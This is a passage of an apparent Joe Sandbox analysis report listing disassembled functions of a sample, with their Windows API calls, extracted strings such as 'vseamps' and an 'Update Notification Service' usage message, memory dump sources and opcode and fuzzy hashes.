                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                • String ID: CONOUT$
                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                                                • Instruction ID: d6e3fe966b1ae33d53e51d73b65c9d03710d9330b42a1facbbfcc81ee0a017a1
                                                                                                                • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                                                • Instruction Fuzzy Hash: 45118461718B41C2EB509F66E944B2AB3A0FB98FE4F484234E95D5B794CF3CD9448744
                                                                                                                Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                                                                                • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                                                                                  • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                                                                                  • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                                                                                  • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                                                                                  • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                                                                                  • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                                                                                  • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                                                                                  • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                                                                                  • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                                                                                  • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                                                                                  • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                                                                                  • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                                                                                • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                                                                                • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                                                                                  • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                                                                                  • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                                                                                  • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                                                                                  • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                                                                                  • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                                                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                                                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                                                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                                                                                  • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                                                                                  • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                                                                                  • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                                                                                  • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                                                                                  • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                                                                                  • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                                                                                  • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                                                                                  • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                                                                                  • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                                                                                • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                                                                                • String ID: vseamps
                                                                                                                • API String ID: 3197017603-3944098904
                                                                                                                • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                                                • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                                                                                • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                                                • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                                                                                Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Messagesprintf_s
                                                                                                                • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                                                                                • API String ID: 2642950106-3610746849
                                                                                                                • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                                                                • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                                                                                • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                                                                • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                                                                                Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                                                                • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                                                                                • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                                                                • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                                                                                Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                                                                • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                                                                                • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                                                                • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                                                                                Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                                                                                • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 319667368-0
                                                                                                                • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                                                                • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                                                                                • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                                                                • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                                                                                Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                                                                                  • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                                                                                • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1390108997-0
                                                                                                                • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                                                                • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                                                                                • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                                                                • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                                                                                Function 00007FFBC3204CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                • String ID: csm$csm$csm
                                                                                                                • API String ID: 3523768491-393685449
                                                                                                                • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                                                                • Instruction ID: 912062a1e2a10727d625d8450e062c860dbc12f463aac3a044a03264adc94223
                                                                                                                • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                                                                • Instruction Fuzzy Hash: 49E195B29087818AEF10AF74D480BBE77A1FB45B48F984135DB9D6B656CF38E489C740
                                                                                                                Function 00007FFBC32095BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC32095CB
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC3209601
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320962E
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320963F
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC3209650
                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320966B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2506987500-0
                                                                                                                • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                                                                • Instruction ID: ed1c50bb17997c49093f04b477dda85b111a87f84caeb1cb6af2fb04ca1e063c
                                                                                                                • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                                                                • Instruction Fuzzy Hash: 43113AB0A0C24245FE647F31D65193B63529F48BB0F884334E82F2E6E6DE2CA4459700
                                                                                                                Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3326452711-0
                                                                                                                • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                                                                • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                                                                                • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                                                                • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                                                                                Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                                                • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                                                                                • API String ID: 2984211723-1229430080
                                                                                                                • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                                                                • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                                                                                • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                                                                • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                                                                                Function 00007FFBC3207F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                                                                • Instruction ID: 7a259519bc08c6f0ac289ccbe8cc23391b6b7254e680c1ba314532043cd12642
                                                                                                                • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                                                                • Instruction Fuzzy Hash: 77F04FA5A1970691EF10AF34E444B3B7731AF88B61FD80335DAAD5A6E4CF2CD849C340
                                                                                                                Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                                                                                • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                                                                                • ExitProcess.KERNEL32 ref: 0000000140008545
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressExitHandleModuleProcProcess
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 75539706-1276376045
                                                                                                                • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                                                                • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                                                                                • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                                                                • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                                                                                Function 00007FFBC32040D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 1740715915-0
                                                                                                                • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                                                                • Instruction ID: 2a28e95cb6a7a6a9ee381350e7d0791bf42304456d6e64d1f1a1e726382e0cae
                                                                                                                • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                                                                • Instruction Fuzzy Hash: F9B1B2B1A0A64285EE65FF71D480A3A67A0EF54B84F9DC435DE4C2F785DE3CE8498B40
                                                                                                                Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
